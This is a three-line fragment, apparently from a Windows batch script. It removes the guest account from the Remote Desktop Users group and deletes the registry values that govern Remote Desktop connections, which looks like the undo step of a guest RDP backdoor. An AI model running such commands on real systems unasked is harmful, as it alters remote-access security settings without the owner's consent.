net localgroup "Remote Desktop Users" guest /delete
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f
```